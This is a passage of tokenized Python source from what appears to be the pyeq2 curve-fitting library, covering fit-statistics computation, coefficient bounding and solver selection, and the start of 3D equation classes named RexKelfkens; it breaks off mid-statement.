. exampleData = '''<STR_LIT>''' <EOL> except : <EOL> pass <EOL> def CalculateCoefficientAndFitStatistics ( self ) : <EOL> self . nobs = len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> self . ncoef = len ( self . solvedCoefficients ) <EOL> self . df_e = self . nobs - self . ncoef <EOL> self . df_r = self . ncoef - <NUM_LIT:1> <EOL> self . sumOfSquaredErrors = numpy . sum ( self . modelAbsoluteError * self . modelAbsoluteError ) <EOL> upperCoefficientBounds = self . upperCoefficientBounds <EOL> lowerCoefficientBounds = self . lowerCoefficientBounds <EOL> fixedCoefficients = self . fixedCoefficients <EOL> self . upperCoefficientBounds = [ ] <EOL> self . lowerCoefficientBounds = [ ] <EOL> self . fixedCoefficients = [ ] <EOL> try : <EOL> self . r2 = <NUM_LIT:1.0> - self . modelAbsoluteError . var ( ) / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] . var ( ) <EOL> if self . r2 < <NUM_LIT:0.0> : <EOL> self . r2 = None <EOL> except : <EOL> self . r2 = None <EOL> try : <EOL> self . rmse = numpy . sqrt ( self . sumOfSquaredErrors / self . nobs ) <EOL> except : <EOL> self . rmse = None <EOL> try : <EOL> self . r2adj = <NUM_LIT:1.0> - ( <NUM_LIT:1.0> - self . r2 ) * ( ( self . nobs - <NUM_LIT:1.0> ) / ( self . nobs - self . ncoef ) ) <EOL> except : <EOL> self . r2adj = None <EOL> try : <EOL> self . Fstat = ( self . r2 / self . df_r ) / ( ( <NUM_LIT:1.0> - self . r2 ) / self . df_e ) <EOL> except : <EOL> self . Fstat = None <EOL> try : <EOL> self . Fpv = <NUM_LIT:1.0> - scipy . stats . f . cdf ( self . Fstat , self . df_r , self . df_e ) <EOL> except : <EOL> self . Fpv = None <EOL> try : <EOL> self . ll = - ( self . nobs * <NUM_LIT:0.5> ) * ( <NUM_LIT:1.0> + numpy . log ( <NUM_LIT> * numpy . pi ) ) - ( self . nobs * <NUM_LIT:0.5> ) * numpy . log ( numpy . dot ( self . modelAbsoluteError , self . modelAbsoluteError ) / self . nobs ) <EOL> except : <EOL> self . ll = None <EOL> try : <EOL> self . aic = - <NUM_LIT> * self . ll / self . nobs + ( <NUM_LIT> * self . ncoef / self . nobs ) <EOL> except : <EOL> self . aic = None <EOL> try : <EOL> self . bic = - <NUM_LIT> * self . ll / self . nobs + ( self . ncoef * numpy . log ( self . nobs ) ) / self . nobs <EOL> except : <EOL> self . bic = None <EOL> if self . splineFlag == True : <EOL> self . cov_beta = None <EOL> self . sd_beta = None <EOL> self . tstat_beta = None <EOL> self . pstat_beta = None <EOL> self . ci = None <EOL> return <EOL> else : <EOL> model = scipy . odr . odrpack . Model ( self . WrapperForODR ) <EOL> self . dataCache . FindOrCreateAllDataCache ( self ) <EOL> data = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> myodr = scipy . odr . odrpack . ODR ( data , model , beta0 = self . solvedCoefficients , maxit = <NUM_LIT:0> ) <EOL> myodr . set_job ( fit_type = <NUM_LIT:2> ) <EOL> parameterStatistics = myodr . run ( ) <EOL> self . cov_beta = parameterStatistics . cov_beta <EOL> try : <EOL> self . sd_beta = parameterStatistics . sd_beta * parameterStatistics . sd_beta <EOL> except : <EOL> self . sd_beta = None <EOL> self . ci = [ ] <EOL> t_df = scipy . stats . t . ppf ( <NUM_LIT> , self . df_e ) <EOL> for i in range ( len ( self . solvedCoefficients ) ) : <EOL> self . ci . append ( [ self . solvedCoefficients [ i ] - t_df * parameterStatistics . sd_beta [ i ] , self . solvedCoefficients [ i ] + t_df * parameterStatistics . sd_beta [ i ] ] ) <EOL> try : <EOL> self . tstat_beta = self . solvedCoefficients / parameterStatistics . sd_beta <EOL> except : <EOL> self . tstat_beta = None <EOL> try : <EOL> self . pstat_beta = ( <NUM_LIT:1.0> - scipy . stats . t . cdf ( numpy . abs ( self . tstat_beta ) , self . df_e ) ) * <NUM_LIT> <EOL> except : <EOL> self . pstat_beta = None <EOL> if len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> self . nobs_weighted = len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> self . ncoef_weighted = len ( self . solvedCoefficients ) <EOL> self . df_e_weighted = self . nobs - self . ncoef <EOL> self . df_r_weighted = self . ncoef - <NUM_LIT:1> <EOL> absoluteErrorWeighted = self . modelAbsoluteError * self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> self . sumOfSquaredErrors_weighted = numpy . sum ( absoluteErrorWeighted * absoluteErrorWeighted ) <EOL> try : <EOL> self . r2_weighted = <NUM_LIT:1.0> - absoluteErrorWeighted . var ( ) / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] . var ( ) <EOL> except : <EOL> self . r2_weighted = None <EOL> try : <EOL> self . rmse_weighted = numpy . sqrt ( self . sumOfSquaredErrors_weighted / self . nobs_weighted ) <EOL> except : <EOL> self . rmse_weighted = None <EOL> try : <EOL> self . r2adj_weighted = <NUM_LIT:1.0> - ( <NUM_LIT:1.0> - self . r2_weighted ) * ( ( self . nobs_weighted - <NUM_LIT:1.0> ) / ( self . nobs_weighted - self . ncoef_weighted ) ) <EOL> except : <EOL> self . r2adj_weighted = None <EOL> try : <EOL> self . Fstat_weighted = ( self . r2_weighted / self . df_r_weighted ) / ( ( <NUM_LIT:1.0> - self . r2_weighted ) / self . df_e_weighted ) <EOL> except : <EOL> self . Fstat_weighted = None <EOL> try : <EOL> self . Fpv_weighted = <NUM_LIT:1.0> - scipy . stats . f . cdf ( self . Fstat_weighted , self . df_r_weighted , self . df_e_weighted ) <EOL> except : <EOL> self . Fpv_weighted = None <EOL> try : <EOL> self . ll_weighted = - ( self . nobs_weighted * <NUM_LIT:0.5> ) * ( <NUM_LIT:1.0> + numpy . log ( <NUM_LIT> * numpy . pi ) ) - ( self . nobs_weighted * <NUM_LIT:0.5> ) * numpy . log ( numpy . dot ( absoluteErrorWeighted , absoluteErrorWeighted ) / self . nobs_weighted ) <EOL> except : <EOL> self . ll_weighted = None <EOL> try : <EOL> self . aic_weighted = - <NUM_LIT> * self . ll_weighted / self . nobs_weighted + ( <NUM_LIT> * self . ncoef_weighted / self . nobs_weighted ) <EOL> except : <EOL> self . aic_weighted = None <EOL> try : <EOL> self . bic_weighted = - <NUM_LIT> * self . ll_weighted / self . nobs_weighted + ( self . ncoef_weighted * numpy . log ( self . nobs_weighted ) ) / self . nobs_weighted <EOL> except : <EOL> self . bic_weighted = None <EOL> if self . splineFlag == True : <EOL> self . cov_beta_weighted = None <EOL> self . sd_beta_weighted = None <EOL> self . tstat_beta_weighted = None <EOL> self . pstat_beta_weighted = None <EOL> self . ci_weighted = None <EOL> return <EOL> else : <EOL> model_weighted = scipy . odr . odrpack . Model ( self . WrapperForODR ) <EOL> self . dataCache . FindOrCreateAllDataCache ( self ) <EOL> data_weighted = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> myodr_weighted = scipy . odr . odrpack . ODR ( data_weighted , model_weighted , beta0 = self . solvedCoefficients , maxit = <NUM_LIT:0> ) <EOL> myodr_weighted . set_job ( fit_type = <NUM_LIT:2> ) <EOL> parameterStatistics_weighted = myodr_weighted . run ( ) <EOL> self . cov_beta_weighted = parameterStatistics . cov_beta <EOL> try : <EOL> self . sd_beta_weighted = parameterStatistics_weighted . sd_beta * parameterStatistics_weighted . sd_beta <EOL> except : <EOL> self . sd_beta_weighted = None <EOL> self . ci_weighted = [ ] <EOL> t_df_weighted = scipy . stats . t . ppf ( <NUM_LIT> , self . df_e_weighted ) <EOL> for i in range ( len ( self . solvedCoefficients ) ) : <EOL> self . ci_weighted . append ( [ self . solvedCoefficients [ i ] - t_df_weighted * parameterStatistics_weighted . sd_beta [ i ] , self . solvedCoefficients [ i ] + t_df_weighted * parameterStatistics_weighted . sd_beta [ i ] ] ) <EOL> try : <EOL> self . tstat_beta_weighted = self . solvedCoefficients / parameterStatistics_weighted . sd_beta <EOL> except : <EOL> self . tstat_beta_weighted = None <EOL> try : <EOL> self . pstat_beta_weighted = ( <NUM_LIT:1.0> - scipy . stats . t . cdf ( numpy . abs ( self . tstat_beta_weighted ) , self . df_e_weighted ) ) * <NUM_LIT> <EOL> except : <EOL> self . pstat_beta_weighted = None <EOL> else : <EOL> self . nobs_weighted = None <EOL> self . ncoef_weighted = None <EOL> self . df_e_weighted = None <EOL> self . df_r_weighted = None <EOL> self . sumOfSquaredErrors_weighted = None <EOL> self . r2_weighted = None <EOL> self . rmse_weighted = None <EOL> self . r2adj_weighted = None <EOL> self . Fstat_weighted = None <EOL> self . Fpv_weighted = None <EOL> self . ll_weighted = None <EOL> self . aic_weighted = None <EOL> self . bic_weighted = None <EOL> self . cov_beta_weighted = None <EOL> self . sd_beta_weighted = None <EOL> self . tstat_beta_weighted = None <EOL> self . pstat_beta_weighted = None <EOL> self . ci_weighted = None <EOL> self . upperCoefficientBounds = upperCoefficientBounds <EOL> self . lowerCoefficientBounds = lowerCoefficientBounds <EOL> self . fixedCoefficients = fixedCoefficients <EOL> def CalculateModelErrors ( self , inCoeffs , inDictionary ) : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> self . modelPredictions = self . CalculateModelPredictions ( inCoeffs , inDictionary ) <EOL> self . modelAbsoluteError = self . modelPredictions - inDictionary [ '<STR_LIT>' ] <EOL> try : <EOL> if self . dataCache . DependentDataContainsZeroFlag == False : <EOL> self . modelRelativeError = self . modelAbsoluteError / inDictionary [ '<STR_LIT>' ] <EOL> self . modelPercentError = self . modelRelativeError * <NUM_LIT> <EOL> except : <EOL> self . dataCache . DependentDataContainsZeroFlag = True <EOL> self . modelRelativeError = [ ] <EOL> self . modelPercentError = [ ] <EOL> def CalculateReducedDataFittingTarget ( self , inCoeffs ) : <EOL> if not self . AreCoefficientsWithinBounds ( inCoeffs ) : <EOL> try : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> except : <EOL> pass <EOL> try : <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> error = self . CalculateModelPredictions ( inCoeffs , self . dataCache . reducedDataCacheDictionary ) - self . dataCache . reducedDataCacheDictionary [ '<STR_LIT>' ] <EOL> ssq = numpy . sum ( numpy . square ( error ) ) <EOL> except : <EOL> return <NUM_LIT> <EOL> if numpy . isfinite ( ssq ) : <EOL> return ssq <EOL> else : <EOL> return <NUM_LIT> <EOL> def CalculateAllDataFittingTarget ( self , inCoeffs ) : <EOL> if not self . AreCoefficientsWithinBounds ( inCoeffs ) : <EOL> try : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> except : <EOL> pass <EOL> try : <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> self . CalculateModelErrors ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> error = self . modelAbsoluteError <EOL> if len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> error = error * self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . sum ( numpy . square ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> error = error / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> val = numpy . sum ( numpy . square ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . sum ( numpy . abs ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> Q = self . modelPredictions / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] <EOL> sumsqlogQ = numpy . sum ( numpy . square ( numpy . log ( Q ) ) ) <EOL> val = sumsqlogQ <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . sum ( numpy . abs ( error / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . max ( numpy . abs ( error ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = numpy . max ( numpy . abs ( error / self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> model = scipy . odr . odrpack . Model ( self . WrapperForODR ) <EOL> if len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> data = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , we = self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> else : <EOL> data = scipy . odr . odrpack . Data ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> myodr = scipy . odr . odrpack . ODR ( data , model , beta0 = inCoeffs , maxit = <NUM_LIT:0> ) <EOL> myodr . set_job ( fit_type = <NUM_LIT:2> ) <EOL> out = myodr . run ( ) <EOL> val = out . sum_square <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> ncoef = <NUM_LIT:1.0> * len ( inCoeffs ) <EOL> nobs = <NUM_LIT:1.0> * len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) <EOL> ll = - ( nobs * <NUM_LIT:0.5> ) * ( <NUM_LIT:1.0> + numpy . log ( <NUM_LIT> * numpy . pi ) ) - ( nobs * <NUM_LIT:0.5> ) * numpy . log ( numpy . dot ( error , error ) / nobs ) <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = - <NUM_LIT> * ll / nobs + ( <NUM_LIT> * ncoef / nobs ) <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> if self . fittingTarget == "<STR_LIT>" : <EOL> val = - <NUM_LIT> * ll / nobs + ( ncoef * numpy . log ( nobs ) ) / nobs <EOL> if numpy . isfinite ( val ) : <EOL> return val <EOL> else : <EOL> return <NUM_LIT> <EOL> except : <EOL> return <NUM_LIT> <EOL> def Solve ( self , inNonLinearSolverAlgorithmName = '<STR_LIT>' ) : <EOL> solver = pyeq2 . solverService ( ) <EOL> if self . fixedCoefficients != [ ] or self . upperCoefficientBounds != [ ] or self . lowerCoefficientBounds != [ ] or len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> self . _canLinearSolverBeUsedForSSQABS = False <EOL> if self . splineFlag : <EOL> return solver . SolveUsingSpline ( self ) <EOL> elif self . fittingTarget == '<STR_LIT>' and self . CanLinearSolverBeUsedForSSQABS ( ) == True : <EOL> return solver . SolveUsingLinear ( self ) <EOL> elif self . fittingTarget == '<STR_LIT>' : <EOL> if len ( self . deEstimatedCoefficients ) == <NUM_LIT:0> : <EOL> self . deEstimatedCoefficients = solver . SolveUsingDE ( self ) <EOL> return solver . SolveUsingODR ( self ) <EOL> else : <EOL> if len ( self . deEstimatedCoefficients ) == <NUM_LIT:0> : <EOL> self . deEstimatedCoefficients = solver . SolveUsingDE ( self ) <EOL> self . estimatedCoefficients = solver . SolveUsingSelectedAlgorithm ( self , inAlgorithmName = inNonLinearSolverAlgorithmName ) <EOL> return solver . SolveUsingSimplex ( self ) <EOL> def AreCoefficientsWithinBounds ( self , inCoeffs ) : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for index in range ( len ( inCoeffs ) ) : <EOL> if ( self . upperCoefficientBounds [ index ] != None ) and ( inCoeffs [ index ] > self . upperCoefficientBounds [ index ] ) : <EOL> return False <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for index in range ( len ( inCoeffs ) ) : <EOL> if ( self . lowerCoefficientBounds [ index ] != None ) and ( inCoeffs [ index ] < self . lowerCoefficientBounds [ index ] ) : <EOL> return False <EOL> return True <EOL> def GetDisplayName ( self ) : <EOL> return self . extendedVersionHandler . AssembleDisplayName ( self ) <EOL> def GetDisplayHTML ( self ) : <EOL> return self . extendedVersionHandler . AssembleDisplayHTML ( self ) <EOL> def GetDimensionality ( self ) : <EOL> return self . _dimensionality <EOL> def CanLinearSolverBeUsedForSSQABS ( self ) : <EOL> return self . extendedVersionHandler . CanLinearSolverBeUsedForSSQABS ( self . _canLinearSolverBeUsedForSSQABS ) <EOL> def WrapperForScipyCurveFit ( self , data , * inCoeffs ) : <EOL> inCoeffs = numpy . array ( inCoeffs ) <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> return self . CalculateModelPredictions ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> def WrapperForODR ( self , inCoeffs , data ) : <EOL> if not numpy . all ( numpy . isfinite ( data ) ) : <EOL> return numpy . ones ( len ( self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> if numpy . array_equal ( data , self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] ) : <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> result = self . CalculateModelPredictions ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> else : <EOL> tempCache = self . dataCache . allDataCacheDictionary <EOL> self . dataCache . allDataCacheDictionary = { } <EOL> self . dataCache . allDataCacheDictionary [ '<STR_LIT>' ] = data <EOL> self . dataCache . FindOrCreateAllDataCache ( self ) <EOL> if self . upperCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . upperCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] > self . upperCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . upperCoefficientBounds [ i ] <EOL> if self . lowerCoefficientBounds != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . lowerCoefficientBounds [ i ] != None : <EOL> if inCoeffs [ i ] < self . lowerCoefficientBounds [ i ] : <EOL> inCoeffs [ i ] = self . lowerCoefficientBounds [ i ] <EOL> if self . fixedCoefficients != [ ] : <EOL> for i in range ( len ( inCoeffs ) ) : <EOL> if self . fixedCoefficients [ i ] != None : <EOL> inCoeffs [ i ] = self . fixedCoefficients [ i ] <EOL> result = self . CalculateModelPredictions ( inCoeffs , self . dataCache . allDataCacheDictionary ) <EOL> self . dataCache . allDataCacheDictionary = tempCache <EOL> return result <EOL> def GetCoefficientDesignators ( self ) : <EOL> return self . extendedVersionHandler . AssembleCoefficientDesignators ( self ) <EOL> def ShouldDataBeRejected ( self , unused ) : <EOL> true_or_false = self . extendedVersionHandler . ShouldDataBeRejected ( self ) <EOL> if self . dataCache . DependentDataContainsZeroFlag and self . fittingTarget [ - <NUM_LIT:3> : ] == "<STR_LIT>" : <EOL> true_or_false = True <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if true_or_false : <EOL> if self . dataCache . DependentDataContainsZeroFlag and self . fittingTarget [ - <NUM_LIT:3> : ] == "<STR_LIT>" : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . independentData1CannotContainZeroFlag and self . dataCache . independentData1ContainsZeroFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . equation . independentData1CannotContainNegativeFlag and self . dataCache . independentData1ContainsNegativeFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . equation . independentData1CannotContainPositiveFlag and self . dataCache . independentData1ContainsPositiveFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> if self . equation . independentData1CannotContainBothPositiveAndNegativeFlag and self . dataCache . independentData1ContainsPositiveFlag and self . dataCache . independentData1ContainsNegativeFlag : <EOL> self . reasonWhyDataRejected = '<STR_LIT>' <EOL> return true_or_false <EOL> def RecursivelyConvertIntStringsToFloatStrings ( self , inList ) : <EOL> returnList = [ ] <EOL> for item in inList : <EOL> if type ( item ) == type ( [ ] ) : <EOL> returnList . append ( self . RecursivelyConvertIntStringsToFloatStrings ( item ) ) <EOL> else : <EOL> if type ( item ) == type ( str ( '<STR_LIT>' ) ) : <EOL> if item . isdigit ( ) : <EOL> returnList . append ( str ( float ( item ) ) ) <EOL> else : <EOL> returnList . append ( item ) <EOL> else : <EOL> returnList . append ( item ) <EOL> return returnList </s>
<s> from __future__ import print_function <EOL> from __future__ import unicode_literals <EOL> from __future__ import absolute_import <EOL> import sys , os <EOL> if os . path . join ( sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] , '<STR_LIT:..>' ) not in sys . path : <EOL> sys . path . append ( os . path . join ( sys . path [ <NUM_LIT:0> ] [ : sys . path [ <NUM_LIT:0> ] . rfind ( os . sep ) ] , '<STR_LIT:..>' ) ) <EOL> import pyeq2 <EOL> import numpy <EOL> numpy . seterr ( all = '<STR_LIT:ignore>' ) <EOL> import pyeq2 . Model_3D_BaseClass <EOL> class RexKelfkens ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = True <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = True <EOL> independentData2CannotContainZeroFlag = True <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = True <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogX ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . LogY ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> logX = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> logY = inDataCacheDictionary [ '<STR_LIT>' ] <EOL> A = inCoeffs [ <NUM_LIT:0> ] <EOL> B = inCoeffs [ <NUM_LIT:1> ] <EOL> C = inCoeffs [ <NUM_LIT:2> ] <EOL> try : <EOL> temp = numpy . exp ( A + B * logX + C * logY ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , inDataCacheDictionary , self ) <EOL> except : <EOL> return numpy . ones ( len ( inDataCacheDictionary [ '<STR_LIT>' ] ) ) * <NUM_LIT> <EOL> def SpecificCodeCPP ( self ) : <EOL> s = "<STR_LIT>" <EOL> return s <EOL> class RexKelfkensTransform ( pyeq2 . Model_3D_BaseClass . Model_3D_BaseClass ) : <EOL> _baseName = "<STR_LIT>" <EOL> _HTML = '<STR_LIT>' <EOL> _leftSideHTML = '<STR_LIT:z>' <EOL> _coefficientDesignators = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _canLinearSolverBeUsedForSSQABS = False <EOL> webReferenceURL = '<STR_LIT>' <EOL> baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False <EOL> autoGenerateOffsetForm = True <EOL> autoGenerateReciprocalForm = True <EOL> autoGenerateInverseForms = True <EOL> autoGenerateGrowthAndDecayForms = True <EOL> independentData1CannotContainZeroFlag = False <EOL> independentData1CannotContainPositiveFlag = False <EOL> independentData1CannotContainNegativeFlag = False <EOL> independentData2CannotContainZeroFlag = False <EOL> independentData2CannotContainPositiveFlag = False <EOL> independentData2CannotContainNegativeFlag = False <EOL> def GetDataCacheFunctions ( self ) : <EOL> functionList = [ ] <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . X ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> functionList . append ( [ pyeq2 . DataCache . DataCacheFunctions . Y ( NameOrValueFlag = <NUM_LIT:1> ) , [ ] ] ) <EOL> return self . extendedVersionHandler . GetAdditionalDataCacheFunctions ( self , functionList ) <EOL> def CalculateModelPredictions ( self , inCoeffs , inDataCacheDictionary ) : <EOL> x_in = inDataCacheDictionary [ '<STR_LIT:X>' ] <EOL> y_in = inDataCacheDictionary [ '<STR_LIT:Y>' ] <EOL> A = inCoeffs [ <NUM_LIT:0> ] <EOL> B = inCoeffs [ <NUM_LIT:1> ] <EOL> C = inCoeffs [ <NUM_LIT:2> ] <EOL> xscale = inCoeffs [ <NUM_LIT:3> ] <EOL> xoffset = inCoeffs [ <NUM_LIT:4> ] <EOL> yscale = inCoeffs [ <NUM_LIT:5> ] <EOL> yoffset = inCoeffs [ <NUM_LIT:6> ] <EOL> try : <EOL> temp = numpy . exp ( A + B * numpy . log ( x_in * xscale + xoffset ) + C * numpy . log ( y_in * yscale + yoffset ) ) <EOL> return self . extendedVersionHandler . GetAdditionalModelPredictions ( temp , inCoeffs , 